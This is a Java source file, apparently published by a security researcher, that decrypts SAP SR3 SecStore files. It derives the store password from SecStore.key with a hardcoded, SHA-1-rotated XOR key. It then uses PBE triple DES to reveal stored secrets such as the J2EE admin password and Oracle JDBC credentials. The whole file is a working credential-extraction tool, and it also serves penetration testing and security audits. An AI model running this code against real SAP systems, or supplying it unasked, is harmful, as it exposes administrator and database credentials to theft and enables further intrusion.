/**
 * SAP SR3 SecStore decrypter
 *           -- nicolas.collignon@synacktiv.com
 *
 * It will decrypt:
 *   - the secstore password
 *   - some SAP console secrets
 *
 * Don't even ask for clean code, exceptions handling, etc. :)
 * 
 * This was dev in Java because i failed at implementing the
 * PbeWithSHAAnd3_KeyTripleDES_CBC derivation scheme in the few
 * minutes allocated for this stuff...
 * 
 * $ java  -cp .:/path/to/iaik_jce_full.jar SapSecStoreDecrypt SecStore.key SecStore.properties ZZ7
 * SecStore version: 6.30.000.001
 * Password: XXXXXXXXXXX
 * admin/port/ZZ7=50004
 * admin/user/ZZ7=J2EE_ADMIN
 * admin/host/ZZ7=XXXXXXXXXXXXXX
 * jdbc/pool/ZZ7=jdbc://Driver?ClassName=oracle.jdbc.driver.OracleDriver&Url=jdbc:oracle:thin:@XXXXXXXX:1521:XXXX&User=XXXXXX&Password=XXXXXXX&
 * admin/password/ZZ7=XXXXXXXXX
 */ 

import iaik.security.provider.IAIK;
import iaik.security.cipher.*;
import iaik.security.spec.PBEKeyAndParameterSpec;


import java.io.BufferedReader;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileReader;
import java.io.InputStreamReader;
import java.nio.charset.Charset;
import java.security.*;
import java.util.Arrays;

import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.spec.PBEParameterSpec;

public class SapSecStoreDecrypt {

	// i love casts
	static final byte[] XOR_KEY = {
		(byte)0x2b, (byte)0xb6, (byte)0x8f, (byte)0xfa, (byte)0x96, (byte)0xec, (byte)0xb6, (byte)0x10,
		(byte)0x24, (byte)0x47, (byte)0x92, (byte)0x65, (byte)0x17, (byte)0xb0, (byte)0x09, (byte)0xc4,
		(byte)0x3e, (byte)0x0a, (byte)0xd7, (byte)0xbd
	};

	// PBE salt
	static final byte[] SALT = new byte[] {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};

	// base64 stuff
	private final static char[] ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".toCharArray();
	private static int[]  toInt   = new int[128];

	// base64 will be implemented in Java 8 ... hourra !
	public static byte[] b64decode(String s){
		int delta = s.endsWith( "==" ) ? 2 : s.endsWith( "=" ) ? 1 : 0;
		byte[] buffer = new byte[s.length()*3/4 - delta];
		int mask = 0xFF;
		int index = 0;
		for(int i=0; i< s.length(); i+=4){
			int c0 = toInt[s.charAt( i )];
			int c1 = toInt[s.charAt( i + 1)];
			buffer[index++]= (byte)(((c0 << 2) | (c1 >> 4)) & mask);
			if(index >= buffer.length){
				return buffer;
			}
			int c2 = toInt[s.charAt( i + 2)];
			buffer[index++]= (byte)(((c1 << 4) | (c2 >> 2)) & mask);
			if(index >= buffer.length){
				return buffer;
			}
			int c3 = toInt[s.charAt( i + 3 )];
			buffer[index++]= (byte)(((c2 << 6) | c3) & mask);
		}
		return buffer;
	} 
	// wtf is wrong with Arrays.asList+indexOf ???  
	static int where_the_fuck_is_the_correct_API(byte[] data, byte sep)
	{
		for (int i=0; i<data.length; ++i) {
			if (data[i] == sep) {
				return i;
			}
		}
		return -1;
	}

	// parse SecStore.key
	static String parseKeyFile(String filename) throws Exception
	{
		FileInputStream fis = new FileInputStream(filename);

		byte data[] = new byte[fis.available()];
		fis.read(data);

		int offset = where_the_fuck_is_the_correct_API(data, (byte)124);
		if (offset <= 0) {
			System.err.println("SecStore.key separator not found");
			return null;
		}
		System.out.println("SecStore version: " + (new String(data, 0, offset)));
		offset += 1; // move after the "|" separator

		int pwd_len = data.length - offset;
		byte[] xor_key = XOR_KEY;
		StringBuffer sb = new StringBuffer();
		while (pwd_len > 0) {
			int max = Math.min(pwd_len, 20);
			for (int j=0; j<max; ++j) {
				sb.append((char) (data[offset++] ^ xor_key[j]));
				pwd_len--;
			}
			if (pwd_len > 0) {
				// rotate xor key
				MessageDigest md = MessageDigest.getInstance("SHA-1");
				md.reset();
				md.update(xor_key);
				xor_key = md.digest();
			}
		}

		return sb.toString();
	}

	// parse SecStore.properties
	static void decryptSecStore(String filename, String passwd, String SID) throws Exception
	{
		String         line;
		PBEParameterSpec pbeParamSpec = new PBEParameterSpec(SALT, 0);
		PBEKeyBMP key = new PBEKeyBMP(passwd+SID);

		FileInputStream fis = new FileInputStream(filename);
		BufferedReader br = new BufferedReader(new InputStreamReader(fis, Charset.forName("UTF-8")));
		while ((line = br.readLine()) != null) {
			// Deal with the line
			if (line.startsWith("#"))
				continue;
			String[] words = line.split("=", 2);
			if (words.length == 2) {
				if (!words[0].startsWith("$internal/")) {
					byte[] val_bytes = b64decode(words[1].replace("\\r\\n", "").replace("\\=", "="));

					Cipher cipher = Cipher.getInstance("PbeWithSHAAnd3_KeyTripleDES_CBC", "IAIK");
					cipher.init(2, key, pbeParamSpec);
					String plaintext = new String(cipher.doFinal(val_bytes));

					if (plaintext.startsWith("java.lang.String|")) {
						String[] parts = plaintext.split("\\|", 3);
						String final_val = parts[2].substring(0, Integer.parseInt(parts[1]));
						System.out.println(words[0] + "=" + final_val); 
					} else {
						System.out.println(words[0] + "=" + plaintext); 
					}
				}
			}

		}
		fis.close();
	}

	static 
	{
		IAIK.addAsJDK14Provider();
		for(int i=0; i< ALPHABET.length; i++){
			toInt[ALPHABET[i]]= i;
		}
	}

	public static void main(String []args) throws Exception
	{
		if (args.length != 3) {
			System.out.println("usage: SapSecStoreDecrypt <SecStore.key> <SecStore.properties> <SID>");
			return;
		}

		String pwd = parseKeyFile(args[0]);

		System.out.println("Password: " + pwd);
		decryptSecStore(args[1], pwd, args[2]);
	}

}
